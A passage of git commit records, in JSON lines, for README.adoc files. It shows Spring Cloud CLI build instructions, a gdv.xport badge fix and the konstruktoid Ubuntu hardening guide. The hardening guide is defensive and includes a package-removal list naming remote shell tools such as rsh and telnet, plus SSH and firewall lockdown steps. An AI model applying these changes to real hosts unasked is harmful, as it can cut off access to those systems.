`@EnableEurekaServer`). You can also easily do things like encryption and decryption to support Spring Cloud\nConfig clients with secret configuration values.\n\n\n== Installation\n\nTo install, make\nsure you have\nhttps:\/\/github.com\/spring-projects\/spring-boot[Spring Boot CLI]\n(1.2.0 or better):\n\n $ spring version\n Spring CLI v1.2.3.RELEASE\n\nE.g. 
for GVM users\n\n```\n$ gvm install springboot 1.3.0.M5\n$ gvm use springboot 1.3.0.M5\n```\n\nand install the Spring Cloud plugin:\n\n```\n$ mvn install\n$ spring install org.springframework.cloud:spring-cloud-cli:1.1.0.BUILD-SNAPSHOT\n```\n\nIMPORTANT: **Prerequisites:** to use the encryption and decryption features\nyou need the full-strength JCE installed in your JVM (it's not there by default).\nYou can download the \"Java Cryptography Extension (JCE) Unlimited Strength Jurisdiction Policy Files\"\nfrom Oracle, and follow instructions for installation (essentially replace the 2 policy files\nin the JRE lib\/security directory with the ones that you downloaded).\n\n== Building\n\n:jdkversion: 1.7\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nFor hints on how to build the project look in `.travis.yml` if there\nis one. There should be a \"script\" and maybe \"install\" command. Also\nlook at the \"services\" section to see if any services need to be\nrunning locally (e.g. mongo or rabbit). Ignore the git-related bits\nthat you might find in \"before_install\" since they're related to setting git\ncredentials and you already have those.\n\nThe projects that require middleware generally include a\n`docker-compose.yml`, so consider using\nhttp:\/\/compose.docker.io\/[Docker Compose] to run the middeware servers\nin Docker containers. See the README in the\nhttps:\/\/github.com\/spring-cloud-samples\/scripts[scripts demo\nrepository] for specific instructions about the common cases of mongo,\nrabbit and redis.\n\nNOTE: If all else fails, build with the command from `.travis.yml` (usually\n`.\/mvnw install`).\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttp:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttp:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttp:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin for maven support. 
Other IDEs and tools\nshould also work without issue.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the http:\/\/eclipse.org\/m2e\/[m2eclipe] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nUnfortunately m2e does not yet support Maven 3.3, so once the projects\nare imported into Eclipse you will also need to tell m2eclipse to use\nthe `.settings.xml` file for the projects. If you do not do this you\nmay see many different errors related to the POMs in the\nprojects. Open your Eclipse preferences, expand the Maven\npreferences, and select User Settings. In the User Settings field\nclick Browse and navigate to the Spring Cloud project you imported\nselecting the `.settings.xml` file in that project. Click Apply and\nthen OK to save the preference changes.\n\nNOTE: Alternatively you can copy the repository settings from https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/.settings.xml[`.settings.xml`] into your own `~\/.m2\/settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n==== Adding Project Lombok Agent\n\nSpring Cloud uses http:\/\/projectlombok.org\/features\/index.html[Project Lombok]\nto generate getters and setters etc. Compiling from the command line this\nshouldn't cause any problems, but in an IDE you need to add an agent\nto the JVM. Full instructions can be found in the Lombok website. The\nsign that you need to do this is a lot of compiler errors to do with\nmissing methods and fields, e.g.\n\n[indent=0]\n----\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 120 Java Problem\nThe method getInitialStatus() is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 121 Java Problem\nThe method setNonSecurePort(int) is undefined for the type EurekaInstanceConfigBean EurekaDiscoveryClientConfiguration.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 112 Java Problem\nThe type EurekaInstanceConfigBean.IdentifyingDataCenterInfo must implement the inherited abstract method DataCenterInfo.getName() EurekaInstanceConfigBean.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/eureka line 131 Java Problem\nThe method getId() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 60 Java Problem\nThe method getLocation() is undefined for the type ProxyRouteLocator.ProxyRouteSpec PreDecorationFilter.java \/spring-cloud-netflix-core\/src\/main\/java\/org\/springframework\/cloud\/netflix\/zuul\/filters\/pre line 55 Java Problem\n----\n\n==== Importing into Intellij\nSpring Cloud projects use annotation processing, particularly Lombok, which requires configuration\nor you will encounter compile problems. It also needs a specific version of maven and a profile\nenabled. 
Intellij 14.1+ requires some configuration to ensure these are setup properly.\n\n 1. Click Preferences, Plugins. *Ensure Lombok is installed*\n 2. Click New, Project from Existing Sources, choose your spring-cloud-sleuth directory\n 3. Choose Maven, and select Environment Settings. *Ensure you are using Maven 3.3.3*\n 4. In the next screen, *Select the profile `spring`* click Next until Finish.\n 5. Click Preferences, \"Build, Execution, Deployment\", Compiler, Annotation Processors. *Click Enable Annotation Processing*\n 6. Click Build, Rebuild Project, and you are ready to go!\n\n==== Importing into other IDEs\nMaven is well supported by most Java IDEs. Refer to you vendor documentation.\n\n\n== Contributing\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/support.springsource.com\/spring_committer_signup[contributor's agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/spring-cloud-build\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. 
If using IntelliJ, you can use the\n http:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do it.\n* If no-one else is using your branch, please rebase it against the current master (or\n other target branch in the main project).\n* When writing a commit message please follow http:\/\/tbaggery.com\/2008\/04\/19\/a-note-about-git-commit-messages.html[these conventions],\n if you are fixing an existing issue please add `Fixes gh-XXXX` at the end of the commit\n message (where XXXX is the issue number).","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eb3a074243776c758e2200baf071c65abdad6fe9","subject":"badge links corrected","message":"badge links corrected\n","repos":"oboehm\/gdv.xport,oboehm\/gdv.xport,oboehm\/gdv.xport","old_file":"README.adoc","new_file":"README.adoc","new_contents":"https:\/\/maven-badges.herokuapp.com\/maven-central\/com.github.oboehm\/gdv-xport[image:https:\/\/maven-badges.herokuapp.com\/maven-central\/com.github.oboehm\/gdv-xport\/badge.svg[Maven Metadata]]\nhttps:\/\/travis-ci.org\/oboehm\/gdv.xport[image:https:\/\/api.travis-ci.org\/oboehm\/gdv.xport.svg?branch=develop\/3.x[BuildStatus]]\nhttps:\/\/coveralls.io\/github\/oboehm\/gdv.xport[image:https:\/\/coveralls.io\/repos\/github\/oboehm\/gdv.xport\/badge.svg?branch=develop%2F3.x[Coverage Status]]\nhttp:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[image:https:\/\/img.shields.io\/badge\/license-Apache%202.0-blue.svg[Apache License 2.0]]\n\n\n\n= Was ist gdv.xport?\n\ngdv.xport ist als Java-Bibliothek gestartet, die den Umgang mit dem GDV-Format erleichtert. \nDas \"x\" in port steht fur \"im\"- und \"ex\"-port. Die Bibliothek ist Open Source und steht unter der Apache License. \n\nMit Version 3.0 gibt es neben dieser Bibliothek auch REST-Services fuer Dateien im GDV-Format. 
\nDie einzelnen Module sind: \n\n* *gdv-xport-lib*: gdv.xport als Java-Bibliothek\n* *gdv-xport-service*: gdv.xport-Services (Spring-Boot-Anwendung)\n\n\n\n== Kompatibilitaet von v2 zu v3\n\nWaehrend Version 2 auf der 2013er-Version der XML-Datei von \"gdv-online\":http:\/\/www.gdv-online.de\/vuvm\/index.htm basiert,\nwurde Version 3 auf die aktuelle Version von 2015 aktualisiert.\nDiese Aenderungen sind aber abwaertskompatibel.\nAllerdings wurde mit der Aktualisierung auch die Bezeichner-Klasse ueberarbeitet:\n\n* die String-Konstanten \"NAME_xxx\", die als _@Deprecated_ waren, wurden entfernt,\n* die Bezeichner-Konstanten wurden geprueft, Schreibfehler entfernt und doppelte Eintraege entfernt,\n* verwaiste Konstanten, die in der XML-Datei nicht vorhanden sind, wurden entfernt.\n\nDadurch kann es sein, dass manche Konstanten irrtuemlich geloescht wurden.\nSollte dies der Fall sein, ein \"Issue\":https:\/\/github.com\/oboehm\/gdv.xport\/issues\/ erstellen.\nMan kann natuerlich auch die Konstanten in seiner Anwendung selber definieren.\n\n\n\n== Aehnliche Projekte\n\nFuer Ruby gibt es \"OpenGDV\":https:\/\/github.com\/vendis\/opengdv\/, einer Open-Source-Bibliothek, die unter der MIT-License steht.\nAllerdings wurde diese Bibliothek schon seit laengerer Zeit nicht mehr aktualisiert.\n\n\n\n== GIT Branching-Modell\n\nEntwickelt wird nach \"A successful Git branching model\":http:\/\/nvie.com\/posts\/a-successful-git-branching-model\/ von Vincent Driessen.\nDie Weiterentwicklung der aktuellen Version findet auf dem develop-Branch statt (derzeit: \"develop\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/develop\/3.x), waehrend das letzte Release im Release-Zweig (derzeit: \"release\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/release\/3.x) zu finden ist.\n\n\n\n== Weitere Infos\n\nIm \"Wiki\":https:\/\/github.com\/oboehm\/gdv.xport\/wiki ist alles Wichtige zu gdv.xport zusammengefasst.\nWeitere Infos wie z.B. die \"JavaDocs\":http:\/\/www.aosd.de\/gdv.xport\/apidocs\/index.html finden Sie auch auf der \"Maven Projekt-Seite\":http:\/\/www.aosd.de\/gdv.xport\/ .\n\n* CI-Build: https:\/\/travis-ci.org\/oboehm\/gdv.xport\n* Wiki: https:\/\/github.com\/oboehm\/gdv.xport\/wiki\n* Projekt-Seite: http:\/\/www.aosd.de\/gdv.xport\/\n","old_contents":"image:https:\/\/maven-badges.herokuapp.com\/maven-central\/com.github.oboehm\/gdv-xport\/badge.svg[Maven metadata URI]\nimage:https:\/\/api.travis-ci.org\/oboehm\/gdv.xport.svg?branch=develop\/3.x[BuildStatus]\nimage:https:\/\/coveralls.io\/repos\/github\/oboehm\/gdv.xport\/badge.svg?branch=develop%2F3.x[Coverage Status]\nimage:https:\/\/img.shields.io\/badge\/license-Apache%202.0-blue.svg[Apache License 2.0]\n\n\n\n= Was ist gdv.xport?\n\ngdv.xport ist als Java-Bibliothek gestartet, die den Umgang mit dem GDV-Format erleichtert. \nDas \"x\" in port steht fur \"im\"- und \"ex\"-port. Die Bibliothek ist Open Source und steht unter der Apache License. \n\nMit Version 3.0 gibt es neben dieser Bibliothek auch REST-Services fuer Dateien im GDV-Format. 
\nDie einzelnen Module sind: \n\n* *gdv-xport-lib*: gdv.xport als Java-Bibliothek\n* *gdv-xport-service*: gdv.xport-Services (Spring-Boot-Anwendung)\n\n\n\n== Kompatibilitaet von v2 zu v3\n\nWaehrend Version 2 auf der 2013er-Version der XML-Datei von \"gdv-online\":http:\/\/www.gdv-online.de\/vuvm\/index.htm basiert,\nwurde Version 3 auf die aktuelle Version von 2015 aktualisiert.\nDiese Aenderungen sind aber abwaertskompatibel.\nAllerdings wurde mit der Aktualisierung auch die Bezeichner-Klasse ueberarbeitet:\n\n* die String-Konstanten \"NAME_xxx\", die als _@Deprecated_ waren, wurden entfernt,\n* die Bezeichner-Konstanten wurden geprueft, Schreibfehler entfernt und doppelte Eintraege entfernt,\n* verwaiste Konstanten, die in der XML-Datei nicht vorhanden sind, wurden entfernt.\n\nDadurch kann es sein, dass manche Konstanten irrtuemlich geloescht wurden.\nSollte dies der Fall sein, ein \"Issue\":https:\/\/github.com\/oboehm\/gdv.xport\/issues\/ erstellen.\nMan kann natuerlich auch die Konstanten in seiner Anwendung selber definieren.\n\n\n\n== Aehnliche Projekte\n\nFuer Ruby gibt es \"OpenGDV\":https:\/\/github.com\/vendis\/opengdv\/, einer Open-Source-Bibliothek, die unter der MIT-License steht.\nAllerdings wurde diese Bibliothek schon seit laengerer Zeit nicht mehr aktualisiert.\n\n\n\n== GIT Branching-Modell\n\nEntwickelt wird nach \"A successful Git branching model\":http:\/\/nvie.com\/posts\/a-successful-git-branching-model\/ von Vincent Driessen.\nDie Weiterentwicklung der aktuellen Version findet auf dem develop-Branch statt (derzeit: \"develop\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/develop\/3.x), waehrend das letzte Release im Release-Zweig (derzeit: \"release\/3.x\":https:\/\/github.com\/oboehm\/gdv.xport\/tree\/release\/3.x) zu finden ist.\n\n\n\n== Weitere Infos\n\nIm \"Wiki\":https:\/\/github.com\/oboehm\/gdv.xport\/wiki ist alles Wichtige zu gdv.xport zusammengefasst.\nWeitere Infos wie z.B. die \"JavaDocs\":http:\/\/www.aosd.de\/gdv.xport\/apidocs\/index.html finden Sie auch auf der \"Maven Projekt-Seite\":http:\/\/www.aosd.de\/gdv.xport\/ .\n\n* CI-Build: https:\/\/travis-ci.org\/oboehm\/gdv.xport\n* Wiki: https:\/\/github.com\/oboehm\/gdv.xport\/wiki\n* Projekt-Seite: http:\/\/www.aosd.de\/gdv.xport\/\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"51f3350bda84c357d34b94b81355840a09d547bd","subject":"update README","message":"update README\n\nSigned-off-by: Thomas Sj\u00f6gren <9ff28d1cb1d19283ed3327b40df6c7d62d8bc343@users.noreply.github.com>\n","repos":"konstruktoid\/hardening,konstruktoid\/hardening","old_file":"README.adoc","new_file":"README.adoc","new_contents":"image::logo\/horizontal.png[Ubuntu Hardening]\n\n= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a Ubuntu server a bit more secure.\n\nTested on `Ubuntu 20.04 Focal Fossa` and `Ubuntu 20.10 Groovy Gorilla (development branch)`.\n\nSystemd required.\n\nIf you're just interested in the security focused systemd configuration, it's\navailable as a link:systemd.adoc[separate document].\n\nIf you're interested in testing your host settings, you'll find the\nlink:README.adoc#tests[instructions here].\n\nNOTE: This is a constant work in progress. Make sure you understand what it\ndoes. `Read the code`.\n\n== Howto\nStart the installation of the server. 
+\nPick language, keyboard layout, timezone and so on as you usually would.\n\n=== Partition the system\n[source,shell]\n----\n\/\n\/boot (rw)\n\/home (rw,nosuid,nodev)\nswap\n\/var\n\/var\/log (rw,nosuid,nodev,noexec)\n\/var\/log\/audit (rw,nosuid,nodev,noexec)\n\/var\/tmp (rw,noexec,nodev,nosuid)\n----\n\nNote that `\/tmp` will be added automatically by the script.\n\n=== Login, set a Grub2 password, configure and run ubuntu.sh\nDo not add any packages. +\nLog in. +\nSelect a Grub2 password with `grub-mkpasswd-pbkdf2`. +\nDownload the script: `git clone https:\/\/github.com\/konstruktoid\/hardening.git`. +\nChange the configuration options in the `ubuntu.cfg` file. +\nRun the script: `sudo bash ubuntu.sh`. +\nReboot.\n\nIf possible, use the newly installed and configured system as a reference,\nor golden, image. Use that image as a baseline installation medium and ensure\nthat any future installations comply with benchmarks and policies using a\nconfiguration management tool, e.g. https:\/\/www.ansible.com\/[Ansible] or\nhttps:\/\/puppet.com\/[Puppet].\n\nIf you're using Ansible, a playbook with most of the functions in this script is\navailable in my Ansible repository https:\/\/github.com\/konstruktoid\/ansible-role-hardening[konstruktoid\/ansible-role-hardening].\n\n== Configuration options\n[source,shell]\n----\nFW_ADMIN='127.0.0.1' \/\/ <1>\nSSH_GRPS='sudo' \/\/ <2>\nSSH_PORT='22' \/\/ <3>\nSYSCTL_CONF='.\/misc\/sysctl.conf' \/\/ <4>\nAUDITD_MODE='1' \/\/ <5>\nAUDITD_RULES='.\/misc\/audit-base.rules .\/misc\/audit-aggressive.rules .\/misc\/audit-docker.rules' \/\/ <6>\nLOGROTATE_CONF='.\/misc\/logrotate.conf' \/\/ <7>\nNTPSERVERPOOL='0.ubuntu.pool.ntp.org 1.ubuntu.pool.ntp.org 2.ubuntu.pool.ntp.org 3.ubuntu.pool.ntp.org pool.ntp.org' \/\/ <8>\nTIMEDATECTL='' \/\/ <9>\nVERBOSE='N' \/\/ <10>\nAUTOFILL='N' \/\/ <11>\nCHANGEME='' \/\/ <12>\n\n# Configuration files\nADDUSER='\/etc\/adduser.conf'\nAUDITDCONF='\/etc\/audit\/auditd.conf'\nAUDITRULES='\/etc\/audit\/rules.d\/hardening.rules'\nCOMMONPASSWD='\/etc\/pam.d\/common-password'\nCOMMONACCOUNT='\/etc\/pam.d\/common-account'\nCOMMONAUTH='\/etc\/pam.d\/common-auth'\nCOREDUMPCONF='\/etc\/systemd\/coredump.conf'\nDEFAULTGRUB='\/etc\/default\/grub.d'\nDISABLEFS='\/etc\/modprobe.d\/disablefs.conf'\nDISABLEMOD='\/etc\/modprobe.d\/disablemod.conf'\nDISABLENET='\/etc\/modprobe.d\/disablenet.conf'\nJOURNALDCONF='\/etc\/systemd\/journald.conf'\nLIMITSCONF='\/etc\/security\/limits.conf'\nLOGINDCONF='\/etc\/systemd\/logind.conf'\nLOGINDEFS='\/etc\/login.defs'\nLOGROTATE='\/etc\/logrotate.conf'\nPAMLOGIN='\/etc\/pam.d\/login'\nRESOLVEDCONF='\/etc\/systemd\/resolved.conf'\nRKHUNTERCONF='\/etc\/default\/rkhunter'\nRSYSLOGCONF='\/etc\/rsyslog.conf'\nSECURITYACCESS='\/etc\/security\/access.conf'\nSSHFILE='\/etc\/ssh\/ssh_config'\nSSHDFILE='\/etc\/ssh\/sshd_config'\nSYSCTL='\/etc\/sysctl.conf'\nSYSTEMCONF='\/etc\/systemd\/system.conf'\nTIMESYNCD='\/etc\/systemd\/timesyncd.conf'\nUFWDEFAULT='\/etc\/default\/ufw'\nUSERADD='\/etc\/default\/useradd'\nUSERCONF='\/etc\/systemd\/user.conf'\n----\n<1> The IP addresses that will be able to connect with SSH, separated by spaces.\n<2> Which group the users have to be a member of in order to access via SSH, separated by spaces.\n<3> Configure SSH port.\n<4> Stricter sysctl settings.\n<5> Auditd failure mode. 0=silent 1=printk 2=panic.\n<6> Auditd rules.\n<7> Logrotate settings.\n<8> NTP server pool.\n<9> Add a specific time zone or use the system default by leaving it empty.\n<10> If you want all the details or not.\n<11> Let the script guess the `FW_ADMIN` and `SSH_GRPS` settings.\n<12> Add something just to verify that you actually glanced the code.\n
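\nFor example, a host managed from two admin workstations over a non-standard SSH port could use values like the following in `ubuntu.cfg`; the addresses and port below are placeholders only:\n\n[source,shell]\n----\nFW_ADMIN='192.0.2.10 192.0.2.11'\nSSH_GRPS='sudo'\nSSH_PORT='2222'\n----\n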
\n== Functions\n\n=== Function list\n\n==== 01_pre\nSetup script, sets APT flags and permission checks.\n\n==== 02_firewall\nEnable `ufw`, use `\/etc\/sysctl.conf`, and allow port 22 from `$FW_ADMIN`.\n\n==== 03_disablenet\nDisable `dccp` `sctp` `rds` `tipc` protocols.\n\n==== 04_disablemnt\nDisable `cramfs` `freevxfs` `jffs2` `hfs` `hfsplus` `squashfs` `udf` `vfat` file\nsystems.\n\n==== 05_systemdconf\nDisable coredumps and crash shells, set `DefaultLimitNOFILE` and\n`DefaultLimitNPROC` to 1024.\n\n==== 06_journalctl\nCompress logs, forward to syslog and make log storage persistent. Ensure rsyslog\nwrites logs with stricter permissions.\n\n==== 07_timesyncd\nAdd four NTP-servers with a latency < 50ms from `$NTPSERVERPOOL`.\n\n==== 08_fstab\nConfigure `\/tmp\/` and `\/var\/tmp\/`. Remove floppy drive entries from `\/etc\/fstab`\nand add `hidepid=2` to `\/proc`.\n\n==== 09_prelink\nUndo prelinking, and remove the `prelink` package.\n\n==== 10_aptget\nConfigure `dpkg` and `apt-get`. `apt-get` update and upgrade.\n\n==== 11_hosts\n`\/etc\/hosts.allow` and `\/etc\/hosts.deny` restrictions.\n\n==== 12_logindefs\nModify `\/etc\/login.defs`, e.g. `UMASK`, password age limits and\n`SHA_CRYPT_MAX_ROUNDS`.\n\n==== 13_sysctl\nUpdate `$SYSCTL` with `$SYSCTL_CONF`.\n\n==== 14_limits\nSet hard and soft limits.\n\n==== 15_adduser\nConfigure `useradd` and `adduser` to set `\/bin\/false` as default shell,\nhome directory permissions to `0750` and lock users 30 days after password\nexpires.\n\n==== 16_rootaccess\nLimit `\/etc\/securetty` to `console`, and `root` from 127.0.0.1 in\n`\/etc\/security\/access.conf`.\n\n==== 17_packages\nInstalls `acct` `aide-common` `apparmor-profiles` `apparmor-utils` `auditd`\n`audispd-plugins` `debsums` `gnupg2` `haveged` `libpam-apparmor`\n`libpam-cracklib` `libpam-tmpdir` `needrestart` `openssh-server` `postfix`\n`rkhunter` `sysstat` `systemd-coredump` `tcpd` `update-notifier-common`\n`vlock`.\n\nRemoves `apport*` `autofs` `avahi*` `beep` `git` `pastebinit`\n`popularity-contest` `rsh*` `rsync` `talk*` `telnet*` `tftp*` `whoopsie`\n`xinetd` `yp-tools` `ypbind`.\n\n==== 18_sshdconfig\nConfigure the `OpenSSH`-daemon.\n\n==== 19_password\nConfigure `pam_cracklib.so` and `pam_tally2.so`.\n\n==== 20_cron\nAllow `root` to use `cron`. 
Mask `atd`.\n\n==== 21_ctraltdel\nDisable Ctrl-alt-delete.\n\n==== 22_auditd\nConfigure `auditd`, use `$AUDITD_RULES` and set failure mode `$AUDITD_MODE`.\n\n==== 23_disablemod\nDisable `bluetooth` `bnep` `btusb` `cpia2` `firewire-core` `floppy` `n_hdlc`\n`net-pf-31` `pcspkr` `soundcore` `thunderbolt` `usb-midi` `usb-storage`\n`uvcvideo` `v4l2_common` kernel modules.\n\nNote that disabling the `usb-storage` will disable any usage of USB storage\ndevices, if such devices are needed `USBGuard` should be configured accordingly.\n\n==== 24_aide\nConfigure `aide`.\n\n==== 25_rhosts\nRemove `hosts.equiv` and `.rhosts`.\n\n==== 26_users\nRemove `games` `gnats` `irc` `list` `news` `sync` `uucp` users.\n\n==== 27_suid\nRemove `suid` bits from the executables listed in\nlink:misc\/suid.list[this document].\n\n==== 28_umask\nSet `bash` and `\/etc\/profile` umask.\n\n==== 29_apparmor\nEnforce present `apparmor` profiles.\n\n==== 30_path\nSet `root` path to `\/usr\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin`,\nand user path to `\/usr\/local\/bin:\/usr\/bin:\/bin`.\n\n==== 31_logindconf\nConfigure `systemd\/logind.conf` and use `KillUserProcesses`.\n\n==== 32_resolvedconf\nConfigure `systemd\/resolved.conf`.\n\n==== 33_rkhunter\nConfigure `rkhunter`.\n\n==== 34_issue\nUpdate `\/etc\/issue` `\/etc\/issue.net` `\/etc\/motd`.\n\n==== 35_apport\nDisable `apport`, `ubuntu-report` and `popularity-contest`.\n\n==== 36_lockroot\nLock the `root` user account.\n\n==== 37_coredump\nDisable coredumps with `systemd\/coredump.conf`.\n\n==== 38_postfix\nDisable the `VRFY` command, configure `smtpd_banner`, `smtpd_client_restrictions`\nand `inet_interfaces`.\n\n==== 39_motdnews\nDisable `motd-news`.\n\n==== 40_usbguard\nInstall and configure `usbguard`.\n\n==== 41_compilers\nRestrict compiler access.\n\n==== 42_kernel\nSet `lockdown=confidentiality` if `\/sys\/kernel\/security\/lockdown` is present.\n\n==== 43_sudo\nConfigure `sudo` with `use_pty`, `logfile`, `!visiblepw`, `!pwfeedback`,\n`passwd_timeout` and `timestamp_timeout`.\n\nRestrict `su` to the `sudo` group.\n\n==== 98_systemddelta\nIf verbose, show `systemd-delta`.\n\n==== 99_post\nEnsure `secureboot-db` is installed, update grub and ensure strict permissions\non boot files.\n\n==== 99_reboot\nPrint if a reboot is required.\n\n=== Function execution order\n[source,shell]\n----\nf_pre\nf_kernel\nf_firewall\nf_disablenet\nf_disablefs\nf_disablemod\nf_systemdconf\nf_resolvedconf\nf_logindconf\nf_journalctl\nf_timesyncd\nf_fstab\nf_prelink\nf_aptget_configure\nf_aptget\nf_hosts\nf_issue\nf_sudo\nf_logindefs\nf_sysctl\nf_limitsconf\nf_adduser\nf_rootaccess\nf_package_install\nf_coredump\nf_usbguard\nf_postfix\nf_apport\nf_motdnews\nf_rkhunter\nf_sshconfig\nf_sshdconfig\nf_password\nf_cron\nf_ctrlaltdel\nf_auditd\nf_aide\nf_rhosts\nf_users\nf_lockroot\nf_package_remove\nf_suid\nf_restrictcompilers\nf_umask\nf_path\nf_aa_enforce\nf_aide_post\nf_aide_timer\nf_aptget_noexec\nf_aptget_clean\nf_systemddelta\nf_post\nf_checkreboot\n----\n\n== Tests\nThere are approximately 700 https:\/\/github.com\/sstephenson\/bats[Bats tests]\nfor most of the above settings available in the link:tests\/[tests directory].\n\n[source,shell]\n----\nsudo apt-get -y install bats\ngit clone https:\/\/github.com\/konstruktoid\/hardening.git\ncd hardening\/tests\/\nsudo bats .\n----\n\n=== Test automation using Vagrant\nRunning `bash .\/runTests.sh` will use https:\/\/www.vagrantup.com\/[Vagrant] to run\nall above tests and https:\/\/github.com\/CISOfy\/Lynis[Lynis] on 
all supported Ubuntu\nversions. The script will generate a file named `TESTRESULTS.adoc`.\n\n=== Testing a host\nRunning `bash .\/runHostTests.sh`, located in the link:tests\/[tests directory],\nwill generate a `TESTRESULTS-<HOSTNAME>.adoc` report.\n\n=== OpenSCAP testing\nTo run a https:\/\/github.com\/ComplianceAsCode\/content[OpenSCAP] test on a\nUbuntu host, where `v0.1.49` should be replaced with the latest available\nversion:\n\n[source,shell]\n----\nsudo apt-get -y install libopenscap8 unzip\nwget https:\/\/github.com\/ComplianceAsCode\/content\/releases\/download\/v0.1.49\/scap-security-guide-0.1.49-oval-510.zip\nunzip scap-security-guide-0.1.49-oval-510.zip\ncd scap-security-guide-0.1.49-oval-5.10\noscap info --fetch-remote-resources .\/ssg-ubuntu1804-ds.xml\nsudo oscap xccdf eval --fetch-remote-resources \\\n --profile xccdf_org.ssgproject.content_profile_anssi_np_nt28_high \\\n --report ..\/bionic_stig-report.html .\/ssg-ubuntu1804-ds.xml\n----\n\n== Recommended reading\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Canonical Ubuntu 18.04 LTS STIG - Ver 1, Rel 1] +\nhttps:\/\/www.cisecurity.org\/benchmark\/distribution_independent_linux\/[CIS Distribution Independent Linux Benchmark] +\nhttps:\/\/www.cisecurity.org\/benchmark\/ubuntu_linux\/[CIS Ubuntu Linux Benchmark] +\nhttps:\/\/www.ncsc.gov.uk\/collection\/end-user-device-security\/platform-specific-guidance\/ubuntu-18-04-lts[EUD Security Guidance: Ubuntu 18.04 LTS]\nhttps:\/\/public.cyber.mil\/stigs\/downloads\/?_dl_facet_stigs=operating-systems%2Cunix-linux[Red Hat Enterprise Linux 7 - Ver 2, Rel 3 STIG] +\nhttps:\/\/wiki.ubuntu.com\/Security\/Features +\nhttps:\/\/help.ubuntu.com\/community\/StricterDefaults +\n\n== Contributing\nDo you want to contribute? That's great! Contributions are always welcome,\nno matter how large or small. If you found something odd, feel free to\nhttps:\/\/github.com\/konstruktoid\/hardening\/issues\/[submit a new issue],\nimprove the code by https:\/\/github.com\/konstruktoid\/hardening\/pulls[creating a pull request],\nor by https:\/\/github.com\/sponsors\/konstruktoid[sponsoring this project].\n\nLogo by https:\/\/github.com\/reallinfo[reallinfo].\n","old_contents":"image::logo\/horizontal.png[Ubuntu Hardening]\n\n= Hardening Ubuntu. Systemd edition.\n:icons: font\n\nA quick way to make a 